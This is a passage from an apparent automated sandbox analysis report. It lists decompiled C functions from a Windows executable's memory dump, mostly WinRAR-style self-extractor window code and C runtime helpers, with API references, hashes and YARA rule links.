						_t13 = _t62 + 3; // 0x3
						if(WideCharToMultiByte(0xfde9, 0, _t64, 0xffffffff, _t13, _t69 - 3, 0, 0) == 0) {
							 *_t62 = 0;
						} else {
							 *_t62 = 0xbbef;
							 *((char*)(_t62 + 2)) = 0xbf;
						}
					}
					L00C52B4E(_t64);
					_t24 =  *0xc6dff8(_t62, 1, _t72 + 0x10);
					if(_t24 >= 0) {
						E00C487DC( *((intOrPtr*)(_t43 + 0x10)));
						_t38 =  *((intOrPtr*)(_t72 + 0xc));
						_t24 =  *((intOrPtr*)( *_t38 + 8))(_t38,  *((intOrPtr*)(_t72 + 0xc)));
					}
					goto L16;
				} else {
					goto L3;
				}
				do {
					L3:
					_t67 = _t67 + 2;
					_t76 =  *_t67 - _t28;
				} while ( *_t67 == _t28);
				goto L4;
			}



















                                            0x00c488bf
                                            0x00c488c2
                                            0x00c488c8
                                            0x00c48a04
                                            0x00c48a04
                                            0x00c488ce
                                            0x00c488d5
                                            0x00c488e0
                                            0x00c488f0
                                            0x00c488f1
                                            0x00c488f6
                                            0x00c488fc
                                            0x00c489ff
                                            0x00000000
                                            0x00c48a00
                                            0x00c48909
                                            0x00c48914
                                            0x00c4891f
                                            0x00c48924
                                            0x00c48927
                                            0x00c4892b
                                            0x00c4892f
                                            0x00c4893a
                                            0x00c48942
                                            0x00c48949
                                            0x00c4894b
                                            0x00c4894d
                                            0x00c48951
                                            0x00c48953
                                            0x00c48953
                                            0x00c48958
                                            0x00c48964
                                            0x00c4896c
                                            0x00c48972
                                            0x00c48973
                                            0x00c48978
                                            0x00c4897a
                                            0x00c48982
                                            0x00c48982
                                            0x00c4898e
                                            0x00c4899a
                                            0x00c4899e
                                            0x00c489a8
                                            0x00c489bd
                                            0x00c489ca
                                            0x00c489bf
                                            0x00c489bf
                                            0x00c489c4
                                            0x00c489c4
                                            0x00c489bd
                                            0x00c489ce
                                            0x00c489dc
                                            0x00c489e5
                                            0x00c489f0
                                            0x00c489f5
                                            0x00c489fc
                                            0x00c489fc
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c48931
                                            0x00c48931
                                            0x00c48931
                                            0x00c48934
                                            0x00c48934
                                            0x00000000

                                            APIs
                                            • GlobalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C487A0), ref: 00C48994
                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00C489B5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: AllocByteCharGlobalMultiWide
                                            • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                            • API String ID: 3286310052-4209811716
                                            • Opcode ID: 18375f0bbc6e16a6c585a306a5acb9255ac3684b96597bac68414836cc89ec99
                                            • Instruction ID: 66b329f8a716c2818739bda932b6ddc4c3d3440e0087b61ebd52ef2c8415e024
                                            • Opcode Fuzzy Hash: 18375f0bbc6e16a6c585a306a5acb9255ac3684b96597bac68414836cc89ec99
                                            • Instruction Fuzzy Hash: BA3146321047417FD328AF609C46F7F7798EF52320F14451AF921961C2EF709A4D97AA
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C48FE6, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 43%
                                            			E00C48FE6(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, struct HWND__* _a8, intOrPtr _a12, intOrPtr _a16, char _a20) {
				struct tagRECT _v16;
				intOrPtr _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				intOrPtr _t32;
				struct HWND__* _t43;
				intOrPtr* _t51;
				void* _t58;
				WCHAR* _t65;
				struct HWND__* _t66;

				_t66 = _a8;
				_t51 = __ecx;
				 *(__ecx + 8) = _t66;
				 *((char*)(__ecx + 0x26)) = _a20;
				ShowWindow(_t66, 0);
				E00C48D3F(_t51, _a4);
				if( *((intOrPtr*)(_t51 + 0x1c)) != 0) {
					L00C52B4E( *((intOrPtr*)(_t51 + 0x1c)));
				}
				if(_a12 != 0) {
					_push(_a12);
					_t32 = E00C5668C(_t51, _t58);
				} else {
					_t32 = 0;
				}
				 *((intOrPtr*)(_t51 + 0x1c)) = _t32;
				 *((intOrPtr*)(_t51 + 0x20)) = _a16;
				GetWindowRect(_t66,  &_v16);
				 *0xc6df88(0,  *0xc6dfd4(_t66,  &_v16, 2));
				if( *(_t51 + 4) != 0) {
					 *0xc6df90( *(_t51 + 4));
				}
				_t39 = _v36;
				_t19 = _t39 + 1; // 0x1
				_t43 =  *0xc6df98(0, L"RarHtmlClassName", 0, 0x40000000, _t19, _v36, _v28 - _v36 - 2, _v28 - _v36,  *0xc6dfd4(_t66, 0,  *_t51, _t51, _t58));
				 *(_t51 + 4) = _t43;
				if( *((intOrPtr*)(_t51 + 0x10)) != 0) {
					__eflags = _t43;
					if(_t43 != 0) {
						ShowWindow(_t43, 5);
						return  *0xc6df8c( *(_t51 + 4));
					}
				} else {
					if(_t66 != 0 &&  *((intOrPtr*)(_t51 + 0x20)) == 0) {
						_t75 =  *((intOrPtr*)(_t51 + 0x1c));
						if( *((intOrPtr*)(_t51 + 0x1c)) != 0) {
							_t43 = E00C48E11(_t51, _t75,  *((intOrPtr*)(_t51 + 0x1c)));
							_t65 = _t43;
							if(_t65 != 0) {
								ShowWindow(_t66, 5);
								SetWindowTextW(_t66, _t65);
								return L00C52B4E(_t65);
							}
						}
					}
				}
				return _t43;
			}














                                            0x00c48fef
                                            0x00c48ff3
                                            0x00c48ff9
                                            0x00c48ffc
                                            0x00c48fff
                                            0x00c4900b
                                            0x00c49014
                                            0x00c49019
                                            0x00c4901e
                                            0x00c49024
                                            0x00c4902a
                                            0x00c4902e
                                            0x00c49026
                                            0x00c49026
                                            0x00c49026
                                            0x00c49034
                                            0x00c4903b
                                            0x00c49044
                                            0x00c4905b
                                            0x00c49065
                                            0x00c4906a
                                            0x00c4906a
                                            0x00c49070
                                            0x00c4907e
                                            0x00c490ab
                                            0x00c490b1
                                            0x00c490b8
                                            0x00c490f2
                                            0x00c490f4
                                            0x00c490f9
                                            0x00000000
                                            0x00c49102
                                            0x00c490ba
                                            0x00c490bc
                                            0x00c490c3
                                            0x00c490c6
                                            0x00c490cd
                                            0x00c490d2
                                            0x00c490d6
                                            0x00c490db
                                            0x00c490e3
                                            0x00000000
                                            0x00c490ef
                                            0x00c490d6
                                            0x00c490c6
                                            0x00c490bc
                                            0x00c4910e

                                            APIs
                                            • ShowWindow.USER32(?,00000000), ref: 00C48FFF
                                            • GetWindowRect.USER32(?,00000000), ref: 00C49044
                                            • ShowWindow.USER32(?,00000005,00000000), ref: 00C490DB
                                            • SetWindowTextW.USER32(?,00000000), ref: 00C490E3
                                            • ShowWindow.USER32(00000000,00000005), ref: 00C490F9
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Window$Show$RectText
                                            • String ID: RarHtmlClassName
                                            • API String ID: 3937224194-1658105358
                                            • Opcode ID: 46d305e16789804b949db3b4ace7978def039264e1c7bd9c81e78d72dc5d2157
                                            • Instruction ID: 9060a295bd9d199272cbce6e3a37a30cb6a7341ca616be244fc7e37942c1e093
                                            • Opcode Fuzzy Hash: 46d305e16789804b949db3b4ace7978def039264e1c7bd9c81e78d72dc5d2157
                                            • Instruction Fuzzy Hash: 4E31AD31904220AFCB219FA59C88F5FBBB8FF48711F004559FD4BAA1A6CB71D944DB62
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C5B506, Relevance: 10.6, APIs: 7, Instructions: 65COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00C5B506(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E00C5B4CA(_t45, 7);
					E00C5B4CA(_t45 + 0x1c, 7);
					E00C5B4CA(_t45 + 0x38, 0xc);
					E00C5B4CA(_t45 + 0x68, 0xc);
					E00C5B4CA(_t45 + 0x98, 2);
					E00C57A50( *((intOrPtr*)(_t45 + 0xa0)));
					E00C57A50( *((intOrPtr*)(_t45 + 0xa4)));
					E00C57A50( *((intOrPtr*)(_t45 + 0xa8)));
					E00C5B4CA(_t45 + 0xb4, 7);
					E00C5B4CA(_t45 + 0xd0, 7);
					E00C5B4CA(_t45 + 0xec, 0xc);
					E00C5B4CA(_t45 + 0x11c, 0xc);
					E00C5B4CA(_t45 + 0x14c, 2);
					E00C57A50( *((intOrPtr*)(_t45 + 0x154)));
					E00C57A50( *((intOrPtr*)(_t45 + 0x158)));
					E00C57A50( *((intOrPtr*)(_t45 + 0x15c)));
					return E00C57A50( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}




                                            0x00c5b50c
                                            0x00c5b511
                                            0x00c5b51a
                                            0x00c5b525
                                            0x00c5b530
                                            0x00c5b53b
                                            0x00c5b549
                                            0x00c5b554
                                            0x00c5b55f
                                            0x00c5b56a
                                            0x00c5b578
                                            0x00c5b586
                                            0x00c5b597
                                            0x00c5b5a5
                                            0x00c5b5b3
                                            0x00c5b5be
                                            0x00c5b5c9
                                            0x00c5b5d4
                                            0x00000000
                                            0x00c5b5e4
                                            0x00c5b5e9

                                            APIs
                                              • Part of subcall function 00C5B4CA: _free.LIBCMT ref: 00C5B4F3
                                            • _free.LIBCMT ref: 00C5B554
                                              • Part of subcall function 00C57A50: RtlFreeHeap.NTDLL(00000000,00000000,?,00C5B4F8,?,00000000,?,00000000,?,00C5B51F,?,00000007,?,?,00C5B91C,?), ref: 00C57A66
                                              • Part of subcall function 00C57A50: GetLastError.KERNEL32(?,?,00C5B4F8,?,00000000,?,00000000,?,00C5B51F,?,00000007,?,?,00C5B91C,?,?), ref: 00C57A78
                                            • _free.LIBCMT ref: 00C5B55F
                                            • _free.LIBCMT ref: 00C5B56A
                                            • _free.LIBCMT ref: 00C5B5BE
                                            • _free.LIBCMT ref: 00C5B5C9
                                            • _free.LIBCMT ref: 00C5B5D4
                                            • _free.LIBCMT ref: 00C5B5DF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: _free$ErrorFreeHeapLast
                                            • String ID:
                                            • API String ID: 776569668-0
                                            • Opcode ID: 47c67bb6ac6dc7fd170de8bd6b40a79d5f713bdac9f6b7190701213f35d3a31d
                                            • Instruction ID: c6bb9a77d9b82266309e6f01c76661a59c3ccf57d2ed0eae19763987f1dfd3c3
                                            • Opcode Fuzzy Hash: 47c67bb6ac6dc7fd170de8bd6b40a79d5f713bdac9f6b7190701213f35d3a31d
                                            • Instruction Fuzzy Hash: 83117236550704A6D930B770CC07FCF7B9C6F10B02F405914BF9E66053D724BAC86658
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C51694, Relevance: 10.6, APIs: 7, Instructions: 60COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 95%
                                            			E00C51694(void* __ecx, void* __edx) {
				void* _t4;
				void* _t11;
				void* _t16;
				long _t26;
				void* _t29;

				if( *0xc6d680 != 0xffffffff) {
					_t26 = GetLastError();
					_t11 = E00C5288E(__eflags,  *0xc6d680);
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E00C528C8(__eflags,  *0xc6d680, 0xffffffff);
							_pop(_t16);
							__eflags = _t4;
							if(_t4 != 0) {
								_t29 = E00C57B1B(_t16, 1, 0x28);
								__eflags = _t29;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E00C528C8(__eflags,  *0xc6d680, 0);
								} else {
									__eflags = E00C528C8(__eflags,  *0xc6d680, _t29);
									if(__eflags != 0) {
										_t11 = _t29;
										_t29 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E00C57A50(_t29);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t26);
					return _t11;
				} else {
					return 0;
				}
			}








                                            0x00c5169b
                                            0x00c516ae
                                            0x00c516b5
                                            0x00c516b8
                                            0x00c516bb
                                            0x00c516d4
                                            0x00c516d4
                                            0x00c516bd
                                            0x00c516bd
                                            0x00c516bf
                                            0x00c516c9
                                            0x00c516cf
                                            0x00c516d0
                                            0x00c516d2
                                            0x00c516e2
                                            0x00c516e6
                                            0x00c516e8
                                            0x00c516fc
                                            0x00c516fc
                                            0x00c51705
                                            0x00c516ea
                                            0x00c516f8
                                            0x00c516fa
                                            0x00c5170e
                                            0x00c51710
                                            0x00c51710
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c516fa
                                            0x00c51713
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c516d2
                                            0x00c516bf
                                            0x00c5171b
                                            0x00c51725
                                            0x00c5169d
                                            0x00c5169f
                                            0x00c5169f

                                            APIs
                                            • GetLastError.KERNEL32(?,?,00C5168B,00C4F0E2), ref: 00C516A2
                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00C516B0
                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00C516C9
                                            • SetLastError.KERNEL32(00000000,?,00C5168B,00C4F0E2), ref: 00C5171B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: ErrorLastValue___vcrt_
                                            • String ID:
                                            • API String ID: 3852720340-0
                                            • Opcode ID: 5d27ed39a9ab1ee4bf9bd652cb6f9ec73b0681e41b5e4350df8d2a141207a411
                                            • Instruction ID: 72875b9dcb791cff1768819a930af1983e4f014939cf8c33ab61af1d99add352
                                            • Opcode Fuzzy Hash: 5d27ed39a9ab1ee4bf9bd652cb6f9ec73b0681e41b5e4350df8d2a141207a411
                                            • Instruction Fuzzy Hash: 6601283E6497115EA7342AB7BC8971A2B98EB113B37280629FC25550E2EF918CC8615C
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C4D27B, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 77%
                                            			E00C4D27B() {
				intOrPtr _t1;
				_Unknown_base(*)()* _t3;
				void* _t5;
				_Unknown_base(*)()* _t6;
				struct HINSTANCE__* _t14;

				_t1 =  *0xc8fe58;
				if(_t1 != 1) {
					if(_t1 == 0) {
						_t14 = GetModuleHandleW(L"KERNEL32.DLL");
						if(_t14 != 0) {
							_t3 = GetProcAddress(_t14, "AcquireSRWLockExclusive");
							if(_t3 == 0) {
								goto L5;
							} else {
								 *0xc8fe5c = _t3;
								_t6 = GetProcAddress(_t14, "ReleaseSRWLockExclusive");
								if(_t6 == 0) {
									goto L5;
								} else {
									 *0xc8fe60 = _t6;
								}
							}
						} else {
							L5:
							_t14 = 1;
						}
						asm("lock cmpxchg [edx], ecx");
						if(0 != 0 || _t14 != 1) {
							if(0 != 1) {
								_t5 = 1;
							} else {
								goto L12;
							}
						} else {
							L12:
							_t5 = 0;
						}
						return _t5;
					} else {
						return 1;
					}
				} else {
					return 0;
				}
			}








                                            0x00c4d27b
                                            0x00c4d286
                                            0x00c4d28e
                                            0x00c4d2a0
                                            0x00c4d2a4
                                            0x00c4d2b0
                                            0x00c4d2b8
                                            0x00000000
                                            0x00c4d2ba
                                            0x00c4d2c0
                                            0x00c4d2c5
                                            0x00c4d2cd
                                            0x00000000
                                            0x00c4d2cf
                                            0x00c4d2cf
                                            0x00c4d2cf
                                            0x00c4d2cd
                                            0x00c4d2a6
                                            0x00c4d2a6
                                            0x00c4d2a6
                                            0x00c4d2a6
                                            0x00c4d2dd
                                            0x00c4d2e3
                                            0x00c4d2eb
                                            0x00c4d2f1
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c4d2ed
                                            0x00c4d2ed
                                            0x00c4d2ed
                                            0x00c4d2ed
                                            0x00c4d2f5
                                            0x00c4d290
                                            0x00c4d293
                                            0x00c4d293
                                            0x00c4d288
                                            0x00c4d28b
                                            0x00c4d28b

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID:
                                            • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                            • API String ID: 0-1718035505
                                            • Opcode ID: d0baf29b2b33b754d21792f683efd50cfa2243cd7c2cc2ea84660439383ccb7d
                                            • Instruction ID: 6cc48c6fc5bea2f06e8253001478e958d312bd40ec171544e229c49c677341b9
                                            • Opcode Fuzzy Hash: d0baf29b2b33b754d21792f683efd50cfa2243cd7c2cc2ea84660439383ccb7d
                                            • Instruction Fuzzy Hash: E301F4717416635B4F317FB55C9079F2384BA07716311017EE822D3250E7D1CE42E790
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C48BE2, Relevance: 9.1, APIs: 6, Instructions: 86COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 96%
                                            			E00C48BE2(signed int _a4, intOrPtr _a8, signed int* _a12) {
				void* _t16;
				signed int _t22;
				void* _t25;
				signed int _t30;
				signed int* _t34;

				_t34 = _a12;
				if(_t34 != 0) {
					_t32 = _a8;
					_t25 = 0x10;
					if(E00C4F3CA(_a8, 0xc640bc, _t25) == 0) {
						L13:
						_t30 = _a4;
						 *_t34 = _t30;
						L14:
						 *((intOrPtr*)( *_t30 + 4))(_t30);
						_t16 = 0;
						L16:
						return _t16;
					}
					if(E00C4F3CA(_t32, 0xc640fc, _t25) != 0) {
						if(E00C4F3CA(_t32, 0xc640dc, _t25) != 0) {
							if(E00C4F3CA(_t32, 0xc640ac, _t25) != 0) {
								if(E00C4F3CA(_t32, 0xc6414c, _t25) != 0) {
									if(E00C4F3CA(_t32, 0xc6409c, _t25) != 0) {
										 *_t34 =  *_t34 & 0x00000000;
										_t16 = 0x80004002;
										goto L16;
									}
									goto L13;
								}
								_t30 = _a4;
								_t22 = _t30 + 0x10;
								L11:
								asm("sbb ecx, ecx");
								 *_t34 =  ~_t30 & _t22;
								goto L14;
							}
							_t30 = _a4;
							_t22 = _t30 + 0xc;
							goto L11;
						}
						_t30 = _a4;
						_t22 = _t30 + 8;
						goto L11;
					}
					_t30 = _a4;
					_t22 = _t30 + 4;
					goto L11;
				}
				return 0x80004003;
			}








                                            0x00c48be6
                                            0x00c48beb
                                            0x00c48bf9
                                            0x00c48bfe
                                            0x00c48c10
                                            0x00c48c9f
                                            0x00c48c9f
                                            0x00c48ca2
                                            0x00c48ca4
                                            0x00c48ca7
                                            0x00c48caa
                                            0x00c48cb6
                                            0x00000000
                                            0x00c48cb7
                                            0x00c48c27
                                            0x00c48c42
                                            0x00c48c5d
                                            0x00c48c78
                                            0x00c48c9d
                                            0x00c48cae
                                            0x00c48cb1
                                            0x00000000
                                            0x00c48cb1
                                            0x00000000
                                            0x00c48c9d
                                            0x00c48c7a
                                            0x00c48c7d
                                            0x00c48c80
                                            0x00c48c84
                                            0x00c48c88
                                            0x00000000
                                            0x00c48c88
                                            0x00c48c5f
                                            0x00c48c62
                                            0x00000000
                                            0x00c48c62
                                            0x00c48c44
                                            0x00c48c47
                                            0x00000000
                                            0x00c48c47
                                            0x00c48c29
                                            0x00c48c2c
                                            0x00000000
                                            0x00c48c2c
                                            0x00000000

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: _memcmp
                                            • String ID:
                                            • API String ID: 2931989736-0
                                            • Opcode ID: 03784b298d9f21b3d206e8660ff29ce09b66c7d057b91f6a1f3e9e8273c0dc60
                                            • Instruction ID: 907be0f52d0d4778a1f6c61f07e5c994d499273f0106ae7de4945d2b267768e1
                                            • Opcode Fuzzy Hash: 03784b298d9f21b3d206e8660ff29ce09b66c7d057b91f6a1f3e9e8273c0dc60
                                            • Instruction Fuzzy Hash: D521957264120AABDB289E11CCD1F7F77ACBB50788F148639FD049A112EB30ED4996B1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C58516, Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 72%
                                            			E00C58516(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0xc6d6ac; // 0x6
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E00C57B1B(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E00C59BA9(_t25, _t36, __eflags,  *0xc6d6ac, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E00C58388(_t25, _t31, 0xc90418);
							E00C57A50(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E00C57A50();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E00C57AD8(_t20, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0xc6d6ac; // 0x6
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E00C57B1B(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E00C59BA9(_t27, _t37, __eflags,  *0xc6d6ac, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E00C58388(_t27, _t32, 0xc90418);
									E00C57A50(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E00C57A50();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E00C59B53(_t25, _t37, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E00C59B53(_t23, _t36, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}





















                                            0x00c58516
                                            0x00c58516
                                            0x00c58516
                                            0x00c58520
                                            0x00c58522
                                            0x00c58527
                                            0x00c5852a
                                            0x00c58538
                                            0x00c5853f
                                            0x00c58544
                                            0x00c58547
                                            0x00c5854a
                                            0x00c5855c
                                            0x00c58561
                                            0x00c58563
                                            0x00c5856e
                                            0x00c58575
                                            0x00c5857a
                                            0x00c5857d
                                            0x00c5857f
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c58565
                                            0x00c58565
                                            0x00000000
                                            0x00c58565
                                            0x00c5854c
                                            0x00c5854c
                                            0x00c5854d
                                            0x00c5854d
                                            0x00c58552
                                            0x00c5858d
                                            0x00c5858e
                                            0x00c58594
                                            0x00c58599
                                            0x00c5859c
                                            0x00c5859d
                                            0x00c5859e
                                            0x00c585a5
                                            0x00c585a7
                                            0x00c585a9
                                            0x00c585ae
                                            0x00c585b1
                                            0x00c585bf
                                            0x00c585cb
                                            0x00c585ce
                                            0x00c585d1
                                            0x00c585e3
                                            0x00c585e8
                                            0x00c585ea
                                            0x00c585f5
                                            0x00c585fb
                                            0x00c58603
                                            0x00c58605
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c585ec
                                            0x00c585ec
                                            0x00000000
                                            0x00c585ec
                                            0x00c585d3
                                            0x00c585d3
                                            0x00c585d4
                                            0x00c585d4
                                            0x00c58607
                                            0x00c58608
                                            0x00c58608
                                            0x00c585b3
                                            0x00c585b9
                                            0x00c585bd
                                            0x00c58610
                                            0x00c58611
                                            0x00c58617
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c585bd
                                            0x00c5861e
                                            0x00c5861e
                                            0x00c5852c
                                            0x00c58532
                                            0x00c58536
                                            0x00c58581
                                            0x00c58582
                                            0x00c5858c
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c58536

                                            APIs
                                            • GetLastError.KERNEL32(?,?,00C53394,?,?,?,00C52E0F,00000050), ref: 00C5851A
                                            • _free.LIBCMT ref: 00C5854D
                                            • _free.LIBCMT ref: 00C58575
                                            • SetLastError.KERNEL32(00000000), ref: 00C58582
                                            • SetLastError.KERNEL32(00000000), ref: 00C5858E
                                            • _abort.LIBCMT ref: 00C58594
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: ErrorLast$_free$_abort
                                            • String ID:
                                            • API String ID: 3160817290-0
                                            • Opcode ID: a14d859793dc1f4766b46d098966e5cc877bfcffd73de051fc2bfd12f462d397
                                            • Instruction ID: 39a2b185b86740f3cecb43aa32508ca466f06961eb4b18828e0aa75944316c94
                                            • Opcode Fuzzy Hash: a14d859793dc1f4766b46d098966e5cc877bfcffd73de051fc2bfd12f462d397
